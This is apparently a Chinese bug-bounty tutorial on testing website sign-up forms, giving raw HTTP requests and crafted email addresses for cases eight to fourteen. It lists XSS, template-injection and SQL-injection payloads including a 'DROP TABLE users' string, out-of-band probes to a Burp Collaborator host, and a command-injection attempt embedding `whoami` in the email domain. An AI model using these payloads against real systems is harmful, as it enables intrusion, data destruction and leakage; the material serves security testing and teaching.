赏金猎人系列-如何测试注册(Sign up)功能以及相关Tips

admin

102262
文章

87
评论

2022年10月29日14:26:08评论72 views字数 2532阅读8分26秒阅读模式

赏金猎人系列-如何测试注册(Sign up)功能以及相关Tips

声明：文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。

正文

本文承接前文赏金猎人系列-如何测试注册(Sign up)功能,继续梳理注册功能的测试流程,相关文章还有:

注册功能测试小结

第八种情况

注册的时候尝试利用带有空格的公司邮箱地址来注册,比方说: "[email protected] "(注意:com后面有一个空格)

可能会发现一些意向不到的情况(可能会发现有额外的权限)

 
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Referer: https://previous.com/path
Origin: https://www.company.com 
Content-Length: Number
firstname=I&lastname=am&[email protected] &password=*****&captcha=Random&token=CSRF

第九种情况

注册公司邮件的时候尝试用大写的邮件,例如[email protected],可能获取额外的权限或获得更多的功能

 
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Referer: https://previous.com/path
Origin: https://www.company.com 
Content-Length: Number

firstname=I&lastname=am&[email protected] &password=*****&captcha=Random&token=CSRF

第十种情况

邮件写成以下形式,你可能会有意想不到的发现:

[email protected]@company.com 
me+(@gmail.com)@company.com 
"[email protected]"@company.com
"<[email protected]>"@company.com 
"[email protected];"@company.com 
"[email protected]+"@company.com

第十一种情况

和上面tips类似,将gmail用googlemail.com 来替代

[email protected]@company.com 
me+(@googlemail.com)@company.com 
"[email protected]"@company.com
"<[email protected]>"@company.com
 "[email protected];"@company.com
"[email protected]+"@company.com

第十二种情况

尝试使用以下payload,看是否能造成xss,ssti或者sqli

me+(<script>alert(0)</script>)@gmail.com 
me(<script>alert(0)</script>)@gmail.com 
me@gmail(<script>alert(0)</script>).com 
"<script>alert(0)</script>"@gmail.com 
"<%= 7 * 7 %>"@gmail.com 
me+(${{7*7}})@gmail.com
"' OR 1=1 -- '"@gmail.com
"me); DROP TABLE users;--"@gmail.com 
%@gmail.com

第十三种情况

尝试用以下payload获取后台信息或者内部IPs

[email protected] 
me@[id.collaborator.net] 
user(;[email protected])@gmail.com 
[email protected](@gmail.com)
 me+(@gmail.com)@id.collaborator.net 
 <[email protected]>[email protected]

第十四种情况

有时候系统在发送之前会ping你的主机,可以尝试利用带有注入系统命令的Burp Collaborator的邮件地址来实现rce

如下所示

 
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Origin: https://www.company.com 
Content-Length: Number

firstname=I&lastname=am&email=me@`whoami`.id.collaborat or.net&password=********&captcha=Random&token=CSRF

参考

http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate

https://dimazarno.medium.com/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17

https://nathandavison.com/blog/exploiting-email-address-parsing-with-aws-ses

原文始发于微信公众号（迪哥讲事）：赏金猎人系列-如何测试注册(Sign up)功能以及相关Tips

左青龙
微信扫一扫

右白虎
微信扫一扫

赏金猎人系列-如何测试注册(Sign up)功能以及相关Tips

正文

第八种情况

第九种情况

第十种情况

第十一种情况

第十二种情况

第十三种情况

第十四种情况

参考

【论文速读】|理解基于大语言模型的模糊测试驱动程序生成

Web攻击应急响应 | 干货

基于ChatGPT大语言模型，通过聊天机器人自动创建vulhub的漏洞靶机环境

科恩BinaryAI@ICSE2024论文解读｜基于大模型的二进制软件成分分析

网络认证：一文带你了解Juniper认证体系！

eBPF及HTTPS明文抓包的分析

京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现

shiro反序列化漏洞绕waf防护的方法总结 | 干货

关于我挖洞的经历

LLM 安全 | 大语言模型应用安全入门

发表评论

在线咨询

微信